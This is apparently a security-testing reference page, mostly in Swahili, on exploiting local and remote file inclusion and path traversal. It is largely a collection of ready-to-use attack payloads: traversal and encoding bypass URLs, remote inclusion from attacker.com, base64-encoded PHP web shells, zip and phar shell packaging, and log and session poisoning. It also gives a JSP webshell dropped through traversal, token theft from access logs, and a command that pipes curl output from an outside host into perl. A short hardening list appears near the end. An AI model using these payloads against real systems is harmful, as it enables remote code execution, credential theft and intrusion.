File Inclusion/Path traversal

Reading time: 28 minutes

File Inclusion

Remote File Inclusion (RFI): Faili inapakiwa kutoka kwenye seva ya mbali (Bora: unaweza kuandika code na seva itaitekeleza). Katika php hii imezimwa kwa chaguo-msingi (allow_url_include).
Local File Inclusion (LFI): Seva inapakia faili ya ndani.

Udhaifu hutokea wakati mtumiaji anaweza kudhibiti kwa namna fulani faili ambayo seva itaipakia.

Ma-function ya PHP yenye udhaifu: require, require_once, include, include_once

Chombo kizuri cha ku-exploit udhaifu huu: https://github.com/kurobeats/fimap

Blind - Interesting - LFI2RCE files

wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ

Linux

Kwa kuchanganya orodha kadhaa za *nix LFI na kuongeza njia zaidi nimeunda hii:

Auto_Wordlists/wordlists/file_inclusion_linux.txt at main \xc2\xb7 carlospolop/Auto_Wordlists \xc2\xb7 GitHub

Pia jaribu kubadilisha / kwa \
Pia jaribu kuongeza ../../../../../

Orodha inayotumia mbinu mbalimbali kutafuta faili /etc/password (kuangalia kama udhaifu upo) inaweza kupatikana hapa

Windows

Muungano wa wordlists tofauti:

Auto_Wordlists/wordlists/file_inclusion_windows.txt at main \xc2\xb7 carlospolop/Auto_Wordlists \xc2\xb7 GitHub

Pia jaribu kubadilisha / kwa \
Pia jaribu kuondoa C:/ na kuongeza ../../../../../

Orodha inayotumia mbinu mbalimbali kutafuta faili /boot.ini (kuangalia kama udhaifu upo) inaweza kupatikana hapa

OS X

Angalia orodha ya LFI ya linux.

Msingi wa LFI na bypasses

Mifano yote ni kwa ajili ya Local File Inclusion lakini yanaweza kutumika pia kwa Remote File Inclusion (page=http://myserver.com/phpshellcode.txt\.

http://example.com/index.php?page=../../../etc/passwd

traversal sequences zimeondolewa bila kutumia recursion

http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd

Null byte (%00)

Bypass kuongezwa kwa herufi zaidi mwishoni mwa string iliyotolewa (bypass of: $_GET['param']."php")

http://example.com/index.php?page=../../../etc/passwd%00

Hili limetatuliwa tangu PHP 5.4

Encoding

Unaweza kutumia encodings zisizo za kawaida kama double URL encode (na nyingine):

http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

Kutoka kwenye folda iliyopo

Huenda back-end inakagua njia ya folda:

http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd

Kuchunguza Saraka za Mfumo wa Faili kwenye Seva

Mfumo wa faili wa seva unaweza kuchunguzwa kwa njia ya recursive ili kubaini saraka, sio tu faili, kwa kutumia mbinu fulani. Mchakato huu unajumuisha kuamua kina cha saraka na kupima uwepo wa folda maalum. Hapa chini kuna mbinu ya kina ya kufanikisha hili:

1. Amua Kina cha Saraka: Tambua kina cha saraka yako ya sasa kwa kuipata kwa mafanikio faili ya /etc/passwd (inatumika ikiwa seva ni ya Linux). URL ya mfano inaweza kuwa imepangwa kama ifuatavyo, ikionyesha kina cha tatu:

http://example.com/index.php?page=../../../etc/passwd # depth of 3

2. Probe for Folders: Ongeza jina la folda unayodhani (e.g., private) kwenye URL, kisha rudi kwenye /etc/passwd. Kiwango cha ziada cha directory kinahitaji kuongeza depth kwa moja:

http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4

3. Tafsiri Matokeo: Jibu la server linaonyesha ikiwa folda ipo:

• Hitilafu / Hakuna Matokeo: Folda private inawezekana haipo mahali uliotaja.
• Yaliyomo ya /etc/passwd: Uwepo wa folda private umehakikishwa.

4. Uchunguzi wa Kurudia: Folda zilizogunduliwa zinaweza kuchunguzwa zaidi kwa kutafuta folda ndogo au faili kwa kutumia mbinu ile ile au mbinu za kawaida za Local File Inclusion (LFI) methods.

Ili kuchunguza saraka katika maeneo tofauti kwenye mfumo wa faili, rekebisha payload ipasavyo. Kwa mfano, kuangalia kama /var/www/ ina saraka private (kwa kuzingatia kwamba saraka ya sasa iko katika kina cha 3), tumia:

http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd

Path Truncation Technique

Path truncation ni njia inayotumika kuchezwa na njia za faili katika web applications. Mara nyingi hutumika kupata faili zilizozuiliwa kwa kupita hatua fulani za usalama zinazoongeza herufi/characters za ziada mwishoni mwa njia za faili. Lengo ni kutengeneza njia ya faili ambayo, mara itakapoathiriwa na kipimo cha usalama, bado inaonyesha kwenye faili inalotakiwa.

In PHP, uwakilishi mbalimbali wa njia ya faili unaweza kuchukuliwa sawa kutokana na muundo wa mfumo wa faili. Kwa mfano:

• /etc/passwd, /etc//passwd, /etc/./passwd, na /etc/passwd/ zote huchukuliwa kuwa njia ileile.
• Wakati herufi 6 za mwisho ni passwd, kuongeza / (kufanya passwd/) haibadilishi faili lengwa.
• Vivyo hivyo, ikiwa .php imeongezwa kwenye njia ya faili (kwa mfano shellcode.php), kuongeza /. mwishoni hakutabadilisha faili inayofikiwa.

Mifano iliyotolewa inaonyesha jinsi ya kutumia path truncation kufikia /etc/passwd, lengo la kawaida kutokana na yaliyomo yake nyeti (taarifa za akaunti za watumiaji):

http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.

http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd

Katika matukio haya, idadi ya traversals zinazohitajika inaweza kuwa takriban 2027, lakini nambari hii inaweza kutofautiana kulingana na usanidi wa server.

• Kutumia Dot Segments na Herufi za Ziada: Traversal sequences (../) zilizochanganywa na dot segments za ziada na herufi zinaweza kutumika kuvinjari mfumo wa faili, zikimsababisha server kupuuza kwa ufanisi maandishi yaliyoongezwa.
• Kukadiria Idadi ya Traversals Zinazohitajika: Kwa njia ya jaribio na makosa, mtu anaweza kupata idadi kamili ya ../ sequences zinazohitajika kufikia saraka ya mizizi na kisha /etc/passwd, kuhakikisha kwamba maandishi yoyote yaliyoongezwa (kama .php) yameshindwa kuathiri njia, lakini njia inayotakiwa (/etc/passwd) inabaki ikiwa sawa.
• Kuanza na Saraka Bandia: Ni desturi ya kawaida kuanza njia na saraka isiyokuwepo (k.m. a/). Mbinu hii inatumiwa kama tahadhari au kutimiza mahitaji ya mantiki ya uchambuzi wa pathi ya server.

Unapotumia mbinu za path truncation, ni muhimu kuelewa tabia ya server katika kuchambua pathi na muundo wa mfumo wa faili. Kila tukio linaweza kuhitaji mbinu tofauti, na mara nyingi upimaji unahitajika kupata njia yenye ufanisi zaidi.

Udhaifu huu ulitatuliwa katika PHP 5.3.

Filter bypass tricks

http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/passwd
http://example.com/index.php?page=PhP://filter

Remote File Inclusion

In php hii imezimwa kwa chaguo-msingi kwa sababu allow_url_include iko Off. Inapaswa kuwa On ili ifanye kazi, na katika hali hiyo unaweza kujumuisha faili ya PHP kutoka kwenye seva yako na kupata RCE:

http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php

Ikiwa kwa sababu fulani allow_url_include iko On, lakini PHP inachuja ufikaji kwa wavuti za nje, kulingana na chapisho hili, unaweza kutumia kwa mfano data protocol pamoja na base64 ili decode PHP code ya b64 na kupata RCE:

PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt

Mfano mwingine usiotumia php:// protokoli ungekuwa:

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt

Python Kipengee cha mzizi

Katika Python, katika msimbo kama huu:

# file_name is controlled by a user
os.path.join(os.getcwd(), "public", file_name)

Ikiwa mtumiaji atapita absolute path kwa file_name, njia ya awali inafutwa tu:

os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'

Hii ni tabia iliyokusudiwa kulingana na the docs:

Ikiwa sehemu ni njia kamili, sehemu zote zilizotangulia zinatupwa na kuunganishwa kunaendelea kutoka kwenye sehemu ya njia kamili.

Java Orodhesha Saraka

Inaonekana kwamba ikiwa una Path Traversal katika Java na uka omba saraka badala ya faili, orodha ya saraka inarudishwa. Hii haitatokea katika lugha nyingine (afaik).

Vigezo 25 vya Juu

Hapa kuna orodha ya vigezo 25 vya juu ambazo zinaweza kuwa vulnerable to local file inclusion (LFI) vulnerabilities (from link):

?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}

LFI / RFI using PHP wrappers & protocols

php://filter

PHP filters zinaruhusu kufanya operesheni za mabadiliko kwenye data kabla ya kusomwa au kuandikwa. Kuna makundi 5 ya filters:

• String Filters:
• string.rot13
• string.toupper
• string.tolower
• string.strip_tags: Ondoa tags kutoka kwenye data (kila kitu kati ya alama "<" na ">" )
• Note that this filter has disappear from the modern versions of PHP
• Conversion Filters
• convert.base64-encode
• convert.base64-decode
• convert.quoted-printable-encode
• convert.quoted-printable-decode
• convert.iconv.* : Hubadilisha kuwa encoding tofauti(convert.iconv.<input_enc>.<output_enc>). Ili kupata orodha ya encodings zote zinazotangazwa endesha kwenye console: iconv -l

• Compression Filters
• zlib.deflate: Compress yaliyomo (inayofaa ikiwa unafanya exfiltrating ya taarifa nyingi)
• zlib.inflate: Decompress the data
• Encryption Filters
• mcrypt.* : Imepitwa na wakati
• mdecrypt.* : Imepitwa na wakati
• Other Filters
• Ukikimbiza ndani ya php var_dump(stream_get_filters()); utaona vichujio kadhaa visivyotarajiwa:
• consumed
• dechunk: inarudisha chunked encoding ya HTTP
• convert.*

# String Filters
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
echo file_get_contents("php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd");
## Same chain without the "|" char
echo file_get_contents("php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd");
## string.string_tags example
echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala");

# Conversion filter
## B64 decode
echo file_get_contents("php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=");
## Chain B64 encode and decode
echo file_get_contents("php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd");
## convert.quoted-printable-encode example
echo file_get_contents("php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=");
=C2=A3hellooo=3D
## convert.iconv.utf-8.utf-16le
echo file_get_contents("php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=");

# Compresion Filter
## Compress + B64
echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd");
readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the data locally
# note that PHP protocol is case-inselective (that's mean you can use "PhP://" and any other varient)

Kutumia php filters kama oracle kusoma faili yoyote

Kwenye chapisho hili inaelezea mbinu ya kusoma faili ya ndani bila kurudishiwa output kutoka kwenye server. Mbinu hii inategemea boolean exfiltration of the file (char by char) using php filters kama oracle. Hii ni kwa sababu php filters zinaweza kutumika kufanya maandishi kuwa makubwa vya kutosha ili php itokee exception.

Kwenye chapisho la awali unaweza kupata ufafanuzi wa kina wa mbinu, lakini hapa kuna muhtasari mfupi:

• Tumia codec UCS-4LE kuweka herufi ya mwanzo ya maandishi mwanzoni na kufanya ukubwa wa string uongezeke kwa njia ya exponent.
• Hii itatumika kuzalisha maandishi makubwa sana wakati herufi ya kwanza inakadiriwa kwa usahihi kiasi kwamba php itasababisha error
• Filter ya dechunk itafanya kuondoa kila kitu ikiwa char ya kwanza si hexadecimal, hivyo tunaweza kujua kama char ya kwanza ni hex.
• Hii, ikichanganywa na ile ya hapo juu (na filters nyingine kulingana na herufi inayokadiriwa), itatuwezesha kukisia herufi mwanzoni mwa maandishi kwa kuona wakati tunapotumia transformations za kutosha kufanya isiwe tabia ya hexadecimal. Kwa sababu ikiwa ni hex, dechunk haitaitoa na bomu la awali litasababisha php error.
• Codec convert.iconv.UNICODE.CP930 hubadilisha kila herufi kuwa ile inayofuata (kwa hivyo baada ya codec hii: a -> b). Hii inatuwezesha kugundua kama herufi ya kwanza ni a kwa mfano kwa sababu ikiwa tutaweka codec hii mara 6 a->b->c->d->e->f->g herufi haitakuwa tena tabia ya hexadecimal, kwa hivyo dechunk haitaitoa na php error itachagizwa kwa sababu inaongezeka pamoja na bomu la awali.
• Kutumia transformations nyingine kama rot13 mwanzoni inawezekana leak herufi nyingine kama n, o, p, q, r (na codecs nyingine zinaweza kutumika kusogeza herufi nyingine kwenye eneo la hex).
• Wakati herufi ya mwanzo ni namba inahitajika kuifanyia base64 encode na leak herufi 2 za kwanza ili leak nambari.
• Tatizo la mwisho ni kuona how to leak more than the initial letter. Kwa kutumia order memory filters kama convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE inawezekana kubadili mpangilio wa chars na kupata katika nafasi ya kwanza herufi nyingine za maandishi.
• Na ili kuweza kupata further data wazo ni generate 2 bytes of junk data at the beginning kwa kutumia convert.iconv.UTF16.UTF16, apply UCS-4LE ili kufanya iwe pivot with the next 2 bytes, na dfuta data hadi data ya taka (hii itaondoa the first 2 bytes za maandishi ya awali). Endelea kufanya hivi hadi utakapofika bit unayotaka leak.

Kwenye chapisho pia tool ya kufanya hili moja kwa moja ilileaked: php_filters_chain_oracle_exploit.

php://fd

Wrapper hii inaruhusu kufikia file descriptors ambazo process imefungua. Inaweza kuwa muhimu kwa exfiltrate maudhui ya faili zilizofunguliwa:

echo file_get_contents("php://fd/3");
$myfile = fopen("/etc/passwd", "r");

Unaweza pia kutumia php://stdin, php://stdout and php://stderr kufikia file descriptors 0, 1 and 2 mtawalia (sijui jinsi hii ingeweza kuwa muhimu katika shambulio)

zip:// and rar://

Pakia faili la Zip au Rar lenye PHPShell ndani, kisha ufikie.
Ili uweze abuse rar protocol, inahitaji kuwezesha mahsusi.

echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php

# To compress with rar
rar a payload.rar payload.php;
mv payload.rar shell.jpg;
rm payload.php
http://example.com/index.php?page=rar://shell.jpg%23payload.php

data://

http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

Kumbuka kwamba protokoli hii inadhibitiwa na mipangilio ya php allow_url_open na allow_url_include

expect://

Expect inahitaji kuwezeshwa. Unaweza kuendesha code kwa kutumia hii:

http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls

input://

Bainisha payload yako katika POST parameters:

curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"

phar://

Faili ya .phar inaweza kutumika kutekeleza code ya PHP wakati web application inatumia functions kama include kwa upakiaji wa faili. Kipande cha code ya PHP kilicho hapa chini kinaonyesha uundaji wa faili ya .phar:

<?php
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
$phar->stopBuffering();

Ili kukusanya faili .phar, amri ifuatayo inapaswa kutekelezwa:

php --define phar.readonly=0 create_path.php

Upon execution, a file named test.phar will be created, which could potentially be leveraged to exploit Local File Inclusion (LFI) vulnerabilities.

In cases where the LFI only performs file reading without executing the PHP code within, through functions such as file_get_contents(), fopen(), file(), file_exists(), md5_file(), filemtime(), or filesize(), exploitation of a deserialization vulnerability could be attempted. This vulnerability is associated with the reading of files using the phar protocol.

For a detailed understanding of exploiting deserialization vulnerabilities in the context of .phar files, refer to the document linked below:

Phar Deserialization Exploitation Guide

phar:// deserialization

CVE-2024-2961

Ilikuwa inawezekana kutumia vibaya any arbitrary file read from PHP that supports php filters kupata RCE. Maelezo ya kina yanaweza found in this post.
Muhtasari mfupi: 3 byte overflow kwenye PHP heap ilitumiwa vibaya ili alter the chain of free chunks za ukubwa maalum ili kuwezesha write anything in any address, hivyo hook iliongezwa kuitisha system.
Ilikuwa inawezekana alloc chunks za ukubwa maalum kwa kutumia zaidi php filters.

Protokoli zaidi

Angalia protokoli zaidi zinazowezekana protocols to include here:

• php://memory and php://temp — Andika katika memory au katika faili ya muda (sijui jinsi hii inaweza kuwa muhimu katika file inclusion attack)
• file:// — Kufikia filesystem ya ndani
• http:// — Kufikia HTTP(s) URLs
• ftp:// — Kufikia FTP(s) URLs
• zlib:// — Compression Streams
• glob:// — Find pathnames matching pattern (It doesn't return nothing printable, so not really useful here)
• ssh2:// — Secure Shell 2
• ogg:// — Audio streams (Not useful to read arbitrary files)

LFI kupitia 'assert' ya PHP

Hatari za Local File Inclusion (LFI) katika PHP ni kubwa hasa wakati unashughulika na function 'assert', ambayo inaweza kuendesha code ndani ya strings. Hii ni hasa tatizo ikiwa input inayojumuisha characters za directory traversal kama ".." inachunguzwa lakini haijasafishwa ipasavyo.

For example, PHP code might be designed to prevent directory traversal like so:

assert("strpos('$file', '..') === false") or die("");

Ingawa hili linakusudia kuzuia traversal, kwa bahati mbaya linaunda vector kwa ajili ya code injection. Ili ku-exploit hili kwa reading file contents, attacker anaweza kutumia:

' and die(highlight_file('/etc/passwd')) or '

Kwa njia sawa, kwa kutekeleza amri yoyote ya mfumo, mtu anaweza kutumia:

' and die(system("id")) or '

Ni muhimu URL-encode these payloads.

PHP Blind Path Traversal

Kwenye this incredible post inaelezea jinsi blind path traversal inaweza kutumiwa kupitia PHP filter kuexfiltrate the content of a file via an error oracle.

Kwa muhtasari, tekniki inatumia "UCS-4LE" encoding kufanya yaliyomo ya faili kuwa kubwa sana kiasi kwamba PHP function opening faili itasababisha error.

Kisha, ili leak the first char, filter dechunk inatumika pamoja na nyingine kama base64 au rot13, na hatimaye filters convert.iconv.UCS-4.UCS-4LE na convert.iconv.UTF16.UTF-16BE zinatumiwa kuweka herufi nyingine mwanzoni na leak them.

Functions that might be vulnerable: file_get_contents, readfile, finfo->file, getimagesize, md5_file, sha1_file, hash_file, file, parse_ini_file, copy, file_put_contents (only target read only with this), stream_get_contents, fgets, fread, fgetc, fgetcsv, fpassthru, fputs

Kwa maelezo ya kiufundi angalia chapisho lililotajwa!

LFI2RCE

Arbitrary File Write via Path Traversal (Webshell RCE)

Wakati server-side code inayopokea/kuupload faili inajenga destination path kwa kutumia data inayodhibitiwa na mtumiaji (mfano, filename au URL) bila kufanya canonicalising na validating, segment za .. na absolute paths zinaweza kutoroka kutoka kwenye directory iliyokusudiwa na kusababisha arbitrary file write. Ikiwa unaweza kuweka payload ndani ya directory iliyo web-exposed, kawaida utapata unauthenticated RCE kwa kudrop webshell.

Typical exploitation workflow:

• Tambua write primitive katika endpoint au background worker ambayo inakubali path/filename na kuandika content kwenye disk (mfano, message-driven ingestion, XML/JSON command handlers, ZIP extractors, n.k.).
• Tambua web-exposed directories. Mifano ya kawaida:
• Apache/PHP: /var/www/html/
• Tomcat/Jetty: <tomcat>/webapps/ROOT/ → drop shell.jsp
• IIS: C:\inetpub\wwwroot\ → drop shell.aspx
• Tunga traversal path itakayovunja kutoka storage directory iliyokusudiwa kwenda webroot, na jumuisha webshell content yako.
• Tembelea payload iliyowekwa na udelege amri.

Notes:

• The vulnerable service that performs the write may listen on a non-HTTP port (e.g., a JMF XML listener on TCP 4004). The main web portal (different port) will later serve your payload.
• On Java stacks, these file writes are often implemented with simple File/Paths concatenation. Lack of canonicalisation/allow-listing is the core flaw.

Generic XML/JMF-style example (product schemas vary – the DOCTYPE/body wrapper is irrelevant for the traversal):

<?xml version="1.0" encoding="UTF-8"?>
<JMF SenderID="hacktricks" Version="1.3">
<Command Type="SubmitQueueEntry">
<!-- Write outside the intake folder into the webroot via traversal -->
<Resource Name="FileName">../../../webapps/ROOT/shell.jsp</Resource>
<Data>
<![CDATA[
<%@ page import="java.io.*" %>
<%
String c = request.getParameter("cmd");
if (c != null) {
Process p = Runtime.getRuntime().exec(c);
try (var in = p.getInputStream(); var out = response.getOutputStream()) {
in.transferTo(out);
}
}
%>
]]>
</Data>
</Command>
</JMF>

Hatua za kuimarisha ambazo zinaweza kuzizuia aina hii ya mende:

• Tambua canonical path na uhakikishe kuwa ni descendant wa saraka ya msingi iliyoorodheshwa.
• Kataa njia yoyote inayojumuisha .., absolute roots, au drive letters; pendelea generated filenames.
• Endesha writer kama akaunti yenye vipengele vichache (low-privileged account) na tenganisha saraka za kuandika kutoka kwa served roots.

Remote File Inclusion

Imeelezewa hapo awali, follow this link.

Kupitia Apache/Nginx log file

Iwapo server ya Apache au Nginx iko vulnerable to LFI ndani ya include function unaweza kujaribu kufikia /var/log/apache2/access.log au /var/log/nginx/access.log, kuweka ndani ya user agent au ndani ya GET parameter php shell kama <?php system($_GET['c']); ?> na include faili hiyo

Hii pia inaweza kufanywa katika logs nyingine lakini kuwa mwangalifu, code ndani ya logs inaweza kuwa URL encoded na hii inaweza kuharibu Shell. Header authorisation "basic" ina "user:password" katika Base64 na ina decoded ndani ya logs. PHPShell inaweza kuingizwa ndani ya header hii.
Njia nyingine zinazowezekana za log:

/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log

Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI

Kusoma access logs ili kuvuna GET-based auth tokens (token replay)

Programu nyingi kwa bahati mbaya zinakubali session/auth tokens kupitia GET (mfano AuthenticationToken, token, sid). Ikiwa una primitive ya path traversal/LFI kuelekea web server logs, unaweza kuiba tokens hizo kutoka access logs na kuzireplay ili kupita kabisa authentication.

How-to:

• Tumia traversal/LFI kusoma web server access log. Mahali ya kawaida:
• /var/log/apache2/access.log, /var/log/httpd/access_log
• /var/log/nginx/access.log
• Baadhi ya endpoints hurudisha file reads Base64-encoded. Ikiwa ndivyo, decode kwenye mashine yako na kagua mistari ya log.
• Tumia grep kutafuta GET requests zinazojumuisha parameter ya token na kamata thamani yake, kisha ireplay dhidi ya application entry point.

Mfano wa mtiririko (generic):

GET /vuln/asset?name=..%2f..%2f..%2f..%2fvar%2flog%2fapache2%2faccess.log HTTP/1.1
Host: target

Dekoda mwili ikiwa ni Base64, kisha rudia token iliyotekwa:

GET /portalhome/?AuthenticationToken=<stolen_token> HTTP/1.1
Host: target

Vidokezo:

• Tokens katika URLs zinarekodiwa kwa default; usikubali bearer tokens kupitia GET katika production systems.
• Ikiwa app inasaidia majina mengi ya token, tafuta vitufe vya kawaida kama AuthenticationToken, token, sid, access_token.
• Zungusha tokens yoyote ambayo inaweza kuwa leak kwenye logs.

Kupitia Barua pepe

Tuma barua kwa akaunti ya ndani (user@localhost) yenye PHP payload yako kama <?php echo system($_REQUEST["cmd"]); ?> na jaribu kujumuisha kwenye barua ya mtumiaji kwa njia kama /var/mail/<USERNAME> au /var/spool/mail/<USERNAME>

Kupitia /proc/*/fd/*

1. Pakia shells nyingi (kwa mfano : 100)
2. Jumuisha http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be brute forced) and $FD the file descriptor (can be brute forced too)

Kupitia /proc/self/environ

Kama faili la log, tuma payload kwenye User-Agent, itaonekana ndani ya faili ya /proc/self/environ

GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>

Kupitia upload

Ikiwa unaweza upload faili, ingiza tu shell payload ndani yake (kwa mfano: <?php system($_GET['c']); ?> ).

http://example.com/index.php?page=path/to/uploaded/file.png

Ili kuweka faili iwe rahisi kusomwa ni bora kuingiza kwenye metadata ya picha/doc/pdf

Kupakia faili la ZIP

Pakia faili la ZIP linalojumuisha PHP shell iliyoshinikizwa na ufikie:

example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php

Kupitia PHP sessions

Angalia ikiwa tovuti inatumia PHP Session (PHPSESSID)

Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly

Katika PHP vikao hivi vinahifadhiwa ndani ya /var/lib/php5/sess\[PHPSESSID]_ mafaili

/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";

Weka cookie kuwa <?php system('cat /etc/passwd');?>

login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php

Tumia LFI kujumuisha PHP session file.

login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2

Kupitia ssh

Ikiwa ssh inafanya kazi angalia ni mtumiaji gani anatumika (/proc/self/status & /etc/passwd) na jaribu kufikia <HOME>/.ssh/id_rsa

Kupitia vsftpd logs

Logs za server ya FTP vsftpd ziko katika /var/log/vsftpd.log. Katika hali ambapo kuna udhaifu wa Local File Inclusion (LFI), na upatikanaji wa server ya vsftpd iliyofunguka unapatikana, hatua zifuatazo zinaweza kuzingatiwa:

1. Ingiza payload ya PHP katika eneo la jina la mtumiaji wakati wa mchakato wa kuingia.
2. Baada ya injection, tumia LFI kupata logs za server kutoka /var/log/vsftpd.log.

Kupitia php base64 filter (using base64)

Kama ilivyoonyeshwa katika makala hii, PHP base64 filter inapuuza tu vitu ambavyo si base64. Unaweza kutumia hilo kupita ukaguzi wa extension ya faili: ikiwa utatoa base64 inayomalizika na ".php", itapuuza "." na kuongeza "php" kwenye base64. Hapa kuna mfano wa payload:

http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php

NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

Kupitia php filters (hakuna faili inayohitajika)

This writeup inafafanua kwamba unaweza kutumia php filters to generate arbitrary content kama output. Ambayo kwa msingi inamaanisha kwamba unaweza generate arbitrary php code kwa include without needing to write it into a file.

LFI2RCE via PHP Filters

Kupitia segmentation fault

Upload faili ambayo itahifadhiwa kama temporary katika /tmp, kisha katika same request, chochea segmentation fault, na basi temporary file won't be deleted na unaweza kuitafuta.

LFI2RCE via Segmentation Fault

Kupitia Nginx temp file storage

Ikiwa umepata Local File Inclusion na Nginx inafanya kazi mbele ya PHP huenda ukaweza kupata RCE kwa mbinu ifuatayo:

LFI2RCE via Nginx temp files

Kupitia PHP_SESSION_UPLOAD_PROGRESS

Ikiwa umepata Local File Inclusion hata kama you don't have a session na session.auto_start iko Off. Ukitoa PHP_SESSION_UPLOAD_PROGRESS katika data ya multipart POST, PHP itakuwezesha enable the session for you. Unaweza kuibua hili kupata RCE:

LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS

Kupitia temp file uploads in Windows

Ikiwa umepata Local File Inclusion na seva inafanya kazi katika Windows unaweza kupata RCE:

LFI2RCE Via temp file uploads

Kupitia pearcmd.php + URL args

As explained in this post, script /usr/local/lib/phppearcmd.php ipo by default katika php docker images. Zaidi ya hayo, inawezekana kupitisha arguments kwa script kupitia URL kwa sababu inaonyesha kwamba ikiwa param ya URL haina =, inapaswa kutumika kama argument. Tazama pia watchTowr’s write-up na Orange Tsai’s “Confusion Attacks”.

The following request create a file in /tmp/hello.php with the content <?=phpinfo()?>:

GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1

Ifuatayo inatumia CRLF vuln kupata RCE (kutoka here):

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a

Kupitia phpinfo() (file_uploads = on)

If you found a Local File Inclusion and a file exposing phpinfo() with file_uploads = on you can get RCE:

LFI2RCE via phpinfo()

